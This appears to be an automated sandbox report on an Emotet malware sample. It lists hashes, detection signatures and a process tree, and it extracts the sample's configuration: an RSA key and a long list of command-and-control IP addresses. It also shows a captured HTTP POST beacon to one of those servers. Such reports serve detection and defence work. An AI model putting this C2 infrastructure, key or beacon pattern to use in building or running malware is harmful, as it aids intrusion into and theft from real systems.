Play interactive tour

Edit tour

Windows Analysis Report NWMEaRqF7s.exe

Overview

General Information

Sample Name:	NWMEaRqF7s.exe
Analysis ID:	445260
MD5:	0ba53dbed762655999bd37a1d8bee9db
SHA1:	4566e7559e5c4287a25796ed622324a6b5b70e63
SHA256:	77ed3ca0af1fec8c76e4f77114090edec76040713e53f6682151b53d79f28c79
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Antivirus or Machine Learning detection for unpacked file

Connects to several IPs in different countries

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NWMEaRqF7s.exe (PID: 2944 cmdline: 'C:\Users\user\Desktop\NWMEaRqF7s.exe' MD5: 0BA53DBED762655999BD37A1D8BEE9DB)

dot3hc.exe (PID: 5536 cmdline: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe MD5: 0BA53DBED762655999BD37A1D8BEE9DB)

svchost.exe (PID: 5976 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4752 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["192.158.216.73:80", "85.214.28.226:8080", "142.44.137.67:443", "162.241.242.173:8080", "85.152.162.105:80", "62.30.7.67:443", "78.24.219.147:8080", "74.120.55.163:80", "169.239.182.217:8080", "216.208.76.186:80", "95.213.236.64:8080", "200.114.213.233:8080", "104.131.44.150:8080", "70.121.172.89:80", "75.139.38.211:80", "185.94.252.104:443", "97.82.79.83:80", "103.86.49.11:8080", "79.98.24.39:8080", "83.169.36.251:8080", "188.219.31.12:80", "74.208.45.104:8080", "137.59.187.107:8080", "174.45.13.118:80", "194.187.133.160:443", "50.81.3.113:80", "201.173.217.124:443", "139.99.158.11:443", "173.62.217.22:443", "139.130.242.43:80", "190.160.53.126:80", "137.119.36.33:80", "209.141.54.221:8080", "24.179.13.119:80", "120.150.60.189:80", "107.5.122.110:80", "121.124.124.40:7080", "203.153.216.189:7080", "157.245.99.39:8080", "85.105.205.77:8080", "173.81.218.65:80", "110.145.77.103:80", "47.144.21.12:443", "95.179.229.244:8080", "187.161.206.24:80", "46.105.131.79:8080", "189.212.199.126:443", "168.235.67.138:7080", "24.137.76.62:80", "85.66.181.138:80", "200.41.121.90:80", "5.39.91.110:7080", "104.236.246.93:8080", "172.91.208.86:80", "99.224.14.125:80", "37.139.21.175:8080", "109.74.5.95:8080", "1.221.254.82:80", "61.19.246.238:443", "5.196.74.210:8080", "67.205.85.243:8080", "79.137.83.50:443", "94.200.114.161:80", "70.180.43.7:80", "190.55.181.54:443", "47.146.117.214:80", "89.205.113.80:80", "37.187.72.193:8080", "84.39.182.7:80", "104.131.11.150:443", "139.162.108.71:8080", "87.106.136.232:8080", "153.232.188.106:80", "37.70.8.161:80", "112.185.64.233:80", "87.106.139.101:8080", "94.23.237.171:443", "24.43.99.75:80", "203.117.253.142:80", "98.109.204.230:80", "93.147.212.206:80", "91.211.88.52:7080", "139.59.60.244:8080", "176.111.60.55:8080", "180.92.239.110:8080", "62.75.141.82:80", "174.102.48.180:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.NWMEaRqF7s.exe.5a23ae.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.dot3hc.exe.22d052e.3.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.dot3hc.exe.22d052e.3.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.dot3hc.exe.22d23ae.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
3.2.dot3hc.exe.22d23ae.2.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.NWMEaRqF7s.exe.5a052e.2.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 3 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: NWMEaRqF7s.exe

Avira: detected

Found malware configuration

Show sources

Source: 3.2.dot3hc.exe.22d052e.3.unpack

Malware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["192.158.216.73:80", "85.214.28.226:8080", "142.44.137.67:443", "162.241.242.173:8080", "85.152.162.105:80", "62.30.7.67:443", "78.24.219.147:8080", "74.120.55.163:80", "169.239.182.217:8080", "216.208.76.186:80", "95.213.236.64:8080", "200.114.213.233:8080", "104.131.44.150:8080", "70.121.172.89:80", "75.139.38.211:80", "185.94.252.104:443", "97.82.79.83:80", "103.86.49.11:8080", "79.98.24.39:8080", "83.169.36.251:8080", "188.219.31.12:80", "74.208.45.104:8080", "137.59.187.107:8080", "174.45.13.118:80", "194.187.133.160:443", "50.81.3.113:80", "201.173.217.124:443", "139.99.158.11:443", "173.62.217.22:443", "139.130.242.43:80", "190.160.53.126:80", "137.119.36.33:80", "209.141.54.221:8080", "24.179.13.119:80", "120.150.60.189:80", "107.5.122.110:80", "121.124.124.40:7080", "203.153.216.189:7080", "157.245.99.39:8080", "85.105.205.77:8080", "173.81.218.65:80", "110.145.77.103:80", "47.144.21.12:443", "95.179.229.244:8080", "187.161.206.24:80", "46.105.131.79:8080", "189.212.199.126:443", "168.235.67.138:7080", "24.137.76.62:80", "85.66.181.138:80", "200.41.121.90:80", "5.39.91.110:7080", "104.236.246.93:8080", "172.91.208.86:80", "99.224.14.125:80", "37.139.21.175:8080", "109.74.5.95:8080", "1.221.254.82:80", "61.19.246.238:443", "5.196.74.210:8080", "67.205.85.243:8080", "79.137.83.50:443", "94.200.114.161:80", "70.180.43.7:80", "190.55.181.54:443", "47.146.117.214:80", "89.205.113.80:80", "37.187.72.193:8080", "84.39.182.7:80", "104.131.11.150:443", "139.162.108.71:8080", "87.106.136.232:8080", "153.232.188.106:80", "37.70.8.161:80", "112.185.64.233:80", "87.106.139.101:8080", "94.23.237.171:443", "24.43.99.75:80", "203.117.253.142:80", "98.109.204.230:80", "93.147.212.206:80", "91.211.88.52:7080", "139.59.60.244:8080", "176.111.60.55:8080", "180.92.239.110:8080", "62.75.141.82:80", "174.102.48.180:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: NWMEaRqF7s.exe	Virustotal: Detection: 84%	Perma Link
Source: NWMEaRqF7s.exe	Metadefender: Detection: 68%	Perma Link
Source: NWMEaRqF7s.exe	ReversingLabs: Detection: 92%

Source: 3.2.dot3hc.exe.22d052e.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe

Code function: 3_2_02301DEC CryptDecodeObjectEx,

3_2_02301DEC

Source: NWMEaRqF7s.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	1_2_00410555
Source: C:\Users\user\Desktop\NWMEaRqF7s.exe	Code function: 1_2_022528FB FindFirstFileW,FindNextFileW,FindClose,	1_2_022528FB
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_00410555 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	3_2_00410555
Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe	Code function: 3_2_023028FB FindFirstFileW,FindNextFileW,FindClose,	3_2_023028FB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 192.158.216.73:80
Source: Malware configuration extractor	IPs: 85.214.28.226:8080
Source: Malware configuration extractor	IPs: 142.44.137.67:443
Source: Malware configuration extractor	IPs: 162.241.242.173:8080
Source: Malware configuration extractor	IPs: 85.152.162.105:80
Source: Malware configuration extractor	IPs: 62.30.7.67:443
Source: Malware configuration extractor	IPs: 78.24.219.147:8080
Source: Malware configuration extractor	IPs: 74.120.55.163:80
Source: Malware configuration extractor	IPs: 169.239.182.217:8080
Source: Malware configuration extractor	IPs: 216.208.76.186:80
Source: Malware configuration extractor	IPs: 95.213.236.64:8080
Source: Malware configuration extractor	IPs: 200.114.213.233:8080
Source: Malware configuration extractor	IPs: 104.131.44.150:8080
Source: Malware configuration extractor	IPs: 70.121.172.89:80
Source: Malware configuration extractor	IPs: 75.139.38.211:80
Source: Malware configuration extractor	IPs: 185.94.252.104:443
Source: Malware configuration extractor	IPs: 97.82.79.83:80
Source: Malware configuration extractor	IPs: 103.86.49.11:8080
Source: Malware configuration extractor	IPs: 79.98.24.39:8080
Source: Malware configuration extractor	IPs: 83.169.36.251:8080
Source: Malware configuration extractor	IPs: 188.219.31.12:80
Source: Malware configuration extractor	IPs: 74.208.45.104:8080
Source: Malware configuration extractor	IPs: 137.59.187.107:8080
Source: Malware configuration extractor	IPs: 174.45.13.118:80
Source: Malware configuration extractor	IPs: 194.187.133.160:443
Source: Malware configuration extractor	IPs: 50.81.3.113:80
Source: Malware configuration extractor	IPs: 201.173.217.124:443
Source: Malware configuration extractor	IPs: 139.99.158.11:443
Source: Malware configuration extractor	IPs: 173.62.217.22:443
Source: Malware configuration extractor	IPs: 139.130.242.43:80
Source: Malware configuration extractor	IPs: 190.160.53.126:80
Source: Malware configuration extractor	IPs: 137.119.36.33:80
Source: Malware configuration extractor	IPs: 209.141.54.221:8080
Source: Malware configuration extractor	IPs: 24.179.13.119:80
Source: Malware configuration extractor	IPs: 120.150.60.189:80
Source: Malware configuration extractor	IPs: 107.5.122.110:80
Source: Malware configuration extractor	IPs: 121.124.124.40:7080
Source: Malware configuration extractor	IPs: 203.153.216.189:7080
Source: Malware configuration extractor	IPs: 157.245.99.39:8080
Source: Malware configuration extractor	IPs: 85.105.205.77:8080
Source: Malware configuration extractor	IPs: 173.81.218.65:80
Source: Malware configuration extractor	IPs: 110.145.77.103:80
Source: Malware configuration extractor	IPs: 47.144.21.12:443
Source: Malware configuration extractor	IPs: 95.179.229.244:8080
Source: Malware configuration extractor	IPs: 187.161.206.24:80
Source: Malware configuration extractor	IPs: 46.105.131.79:8080
Source: Malware configuration extractor	IPs: 189.212.199.126:443
Source: Malware configuration extractor	IPs: 168.235.67.138:7080
Source: Malware configuration extractor	IPs: 24.137.76.62:80
Source: Malware configuration extractor	IPs: 85.66.181.138:80
Source: Malware configuration extractor	IPs: 200.41.121.90:80
Source: Malware configuration extractor	IPs: 5.39.91.110:7080
Source: Malware configuration extractor	IPs: 104.236.246.93:8080
Source: Malware configuration extractor	IPs: 172.91.208.86:80
Source: Malware configuration extractor	IPs: 99.224.14.125:80
Source: Malware configuration extractor	IPs: 37.139.21.175:8080
Source: Malware configuration extractor	IPs: 109.74.5.95:8080
Source: Malware configuration extractor	IPs: 1.221.254.82:80
Source: Malware configuration extractor	IPs: 61.19.246.238:443
Source: Malware configuration extractor	IPs: 5.196.74.210:8080
Source: Malware configuration extractor	IPs: 67.205.85.243:8080
Source: Malware configuration extractor	IPs: 79.137.83.50:443
Source: Malware configuration extractor	IPs: 94.200.114.161:80
Source: Malware configuration extractor	IPs: 70.180.43.7:80
Source: Malware configuration extractor	IPs: 190.55.181.54:443
Source: Malware configuration extractor	IPs: 47.146.117.214:80
Source: Malware configuration extractor	IPs: 89.205.113.80:80
Source: Malware configuration extractor	IPs: 37.187.72.193:8080
Source: Malware configuration extractor	IPs: 84.39.182.7:80
Source: Malware configuration extractor	IPs: 104.131.11.150:443
Source: Malware configuration extractor	IPs: 139.162.108.71:8080
Source: Malware configuration extractor	IPs: 87.106.136.232:8080
Source: Malware configuration extractor	IPs: 153.232.188.106:80
Source: Malware configuration extractor	IPs: 37.70.8.161:80
Source: Malware configuration extractor	IPs: 112.185.64.233:80
Source: Malware configuration extractor	IPs: 87.106.139.101:8080
Source: Malware configuration extractor	IPs: 94.23.237.171:443
Source: Malware configuration extractor	IPs: 24.43.99.75:80
Source: Malware configuration extractor	IPs: 203.117.253.142:80
Source: Malware configuration extractor	IPs: 98.109.204.230:80
Source: Malware configuration extractor	IPs: 93.147.212.206:80
Source: Malware configuration extractor	IPs: 91.211.88.52:7080
Source: Malware configuration extractor	IPs: 139.59.60.244:8080
Source: Malware configuration extractor	IPs: 176.111.60.55:8080
Source: Malware configuration extractor	IPs: 180.92.239.110:8080
Source: Malware configuration extractor	IPs: 62.75.141.82:80
Source: Malware configuration extractor	IPs: 174.102.48.180:443

Source: unknown

Network traffic detected: IP country count 30

Source: global traffic	TCP traffic: 192.168.2.6:49730 -> 85.214.28.226:8080
Source: global traffic	TCP traffic: 192.168.2.6:49732 -> 162.241.242.173:8080
Source: global traffic	TCP traffic: 192.168.2.6:49760 -> 78.24.219.147:8080

Source: Joe Sandbox View	IP Address: 94.200.114.161 94.200.114.161
Source: Joe Sandbox View	IP Address: 139.99.158.11 139.99.158.11
Source: Joe Sandbox View	IP Address: 85.214.28.226 85.214.28.226
Source: Joe Sandbox View	IP Address: 85.214.28.226 85.214.28.226

Source: Joe Sandbox View	ASN Name: ROGERS-COMMUNICATIONSCA ROGERS-COMMUNICATIONSCA
Source: Joe Sandbox View	ASN Name: STARHUB-MOBILEStarHubLtdSG STARHUB-MOBILEStarHubLtdSG
Source: Joe Sandbox View	ASN Name: DU-AS1AE DU-AS1AE

Source: global traffic

HTTP traffic detected: POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 142.44.137.67:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 192.158.216.73
Source: unknown	TCP traffic detected without corresponding DNS query: 192.158.216.73
Source: unknown	TCP traffic detected without corresponding DNS query: 192.158.216.73
Source: unknown	TCP traffic detected without corresponding DNS query: 85.214.28.226
Source: unknown	TCP traffic detected without corresponding DNS query: 85.214.28.226
Source: unknown	TCP traffic detected without corresponding DNS query: 85.214.28.226
Source: unknown	TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown	TCP traffic detected without corresponding DNS query: 142.44.137.67
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.242.173
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.242.173
Source: unknown	TCP traffic detected without corresponding DNS query: 162.241.242.173
Source: unknown	TCP traffic detected without corresponding DNS query: 85.152.162.105
Source: unknown	TCP traffic detected without corresponding DNS query: 85.152.162.105
Source: unknown	TCP traffic detected without corresponding DNS query: 85.152.162.105
Source: unknown	TCP traffic detected without corresponding DNS query: 62.30.7.67
Source: unknown	TCP traffic detected without corresponding DNS query: 62.30.7.67
Source: unknown	TCP traffic detected without corresponding DNS query: 62.30.7.67
Source: unknown	TCP traffic detected without corresponding DNS query: 78.24.219.147
Source: unknown	TCP traffic detected without corresponding DNS query: 78.24.219.147
Source: unknown	TCP traffic detected without corresponding DNS query: 78.24.219.147

Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.facebook.com (Facebook)
Source: svchost.exe, 0000000C.00000002.470826359.0000017DE74EC000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotif equals www.twitter.com (Twitter)
Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z\|\|.\|\|e614b8f2-4086-47b8-a8db-bfa82598f22f\|\|1152921505693648129\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000C.00000002.471604595.0000017DE7D15000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-07-07T08:53:08.3402540Z\|\|.\|\|e614b8f2-4086-47b8-a8db-bfa82598f22f\|\|1152921505693648129\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A